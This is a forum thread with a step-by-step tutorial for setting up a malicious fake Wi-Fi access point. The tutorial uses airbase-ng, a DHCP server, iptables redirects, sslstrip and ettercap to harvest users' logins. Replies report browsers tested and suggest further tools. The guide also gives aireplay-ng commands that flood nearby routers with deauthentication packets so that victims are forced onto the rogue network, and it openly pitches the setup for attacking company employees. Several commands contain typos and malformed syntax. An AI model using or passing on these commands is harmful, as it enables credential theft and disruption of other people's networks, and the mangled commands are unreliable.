Manually Creating a Fake AP to Capture Logins

[queryFrequency]

Note: Yes, I do realize some sites are utilizing TLS, so we'll not be able to capture the logins of those sites unfortunately as the encryption mechanism will not be decrypted. (if you know a way to strip the encryption, please tell me!)

> Explanation of Attack:
We'll be setting up a fake access point where we'll be stripping the encryption of sites using HTTPS to HTTP so we can grab the inputs of the username and password fields. We'll also be sending deauthentication packets to all other routers nearby rendering them useless and forcing the user to log into our malicious access point. This can easily be used for attacks known as"waterhole attacks" where you attack a company where the employees don't even notice they are on an malicious AP because it automatically connected to the malicious one due to the other ones being shutdown.

> Requirements and Lab:
Kali Linux
A network adapter that supports packet injection, monitor mode and master mode.
Exposure to the Linux environment and a decent amount of wireless penetration experience.
A functional brain that can process information.

> Get our default gateway:
You may do this by typing:

Code: [Select]

route -nUnder where it says "Gateway", you'll need to memorize it or write it down as we'll need to use it when we set our IP tables up later on.

> Now let's install DHCP3-server
Firstly, if you haven't done so already, type:

Code: [Select]

apt-get dist-upgrade
When that is done, now let's install DHCP server by typing:

Code: [Select]

apt-get install dhcp3-server
Now when it's done installing, we need to configure the DHCP server by typing:

Code: [Select]

nano /etc/dhcpd.conf
Now, copy and paste the following in:

Code: [Select]

Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}
The only thing you'll need to understand here is the Option domain-name line, where it says "freewifi", you may change that to whatever you want to call your fake (and malicious) access point. For this tutorial, I'll just keep it as freewifi.

Now, just save that by typing CTRL + X and then Y then enter.

> Now let's begin monitor mode
To begin monitor mode, type:

Code: [Select]

airmon-ng start <wireless interface>
Then to attempt to prevent any issues, type:

Code: [Select]

airmon-ng check kill
> Begin the fake access point
Now that you have monitor mode all set up, now let's begin the fake access point:

Code: [Select]

airbase-ng -c 11 -e <fake AP name> <monitor mode>
Now you have began the fake AP, however, if you attempt to access it, you won't be able to. Remember to not close that terminal as you need it to be online.

> Now let's set up the IP table rules
There are a lot of commands here, so I suggest setting up a shell script, and this is how you do it, first type:

Code: [Select]

nano iptables.sh
Now assuming you have basic knowledge of networking, I assume you'll read over this and manually configure some of it as some of it might not work for you.

Code: [Select]

#!/bin/sh
clear
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –t nat –A PREROUTNG –p udp –j DNAT –to <GATEWAY IP HERE>
iptables –P FORWARD ACCEPT
iptables --append FORWARD –-in-interface at0 –j ACCEPT
iptables --table nat -append POSTROUTING --out-interface eth0 –j MASQUERADE
iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 10000
Then give it permissions by typing:

Code: [Select]

chmod +x iptables.sh
Then just run it by typing:

Code: [Select]

./iptables.sh
> Starting the DHCP server
To do this, simply type in:

Code: [Select]

dhcpd –cf /etc/dhcpd.conf –pf /var/run/dhcpd.pid at0
Then to start it, type:

Code: [Select]

/etc/init.d/isc-dhcp-server start
> Starting SSLSTRIP and Ettercap
I assume you know what both of these tools are doing, so let's start of by starting SSLSTRIP:

Code: [Select]

sslstrip –f –p –k 10000
Leave that terminal open. Then to begin ettercap, type:

Code: [Select]

ettercap –p –u –T –q –I  at0
> Sending Deauth packets to all other routers
Firstly, begin scanning for the routers by typing:

Code: [Select]

airodump-ng <monitor mode>
Then, select your target and write down their channel number(s) and BSSID(s). Then set the channels by typing:

Code: [Select]

iwconfig <monitor mode> channel <Ch. Number>
Now, to begin the deauthentication attack, type the following command:

Code: [Select]

aireplay-ng -0 5000 -a <BSSID> <monitor mode> --ignore-negative-one
Now just sit back and wait for the users to log in and gather their data.

[0E 800]

Testing.

@OP What browsers have you tested this against?

I have had spotty success using these kind of attacks against android and apple phones.

Thank you for the tut, will get back with results.

[queryFrequency]

Testing.

@OP What browsers have you tested this against?

I have had spotty success using these kind of attacks against android and apple phones.

Thank you for the tut, will get back with results.

Chrome and Firefox and Safari without any extensions like HTTPS everywhere on my Windows computer, Android phone and iPad. This does unfortunately not work with sites like Facebook and GMail because they are using TLS. You may also want to try sslstrip2 and dns2proxy.

[proxx]

Chrome and Firefox and Safari without any extensions like HTTPS everywhere on my Windows computer, Android phone and iPad. This does unfortunately not work with sites like Facebook and GMail because they are using TLS. You may also want to try sslstrip2 and dns2proxy.

I would advice just passing the traffic and not proxy it, since it cannot be decrypted easily anyway.
Reminds me of some scripts I wrote , I'll try digging it up , pretty much similar approach only I use  hostapd which is awesome stuff.
Airbase is nearly unworkable crap.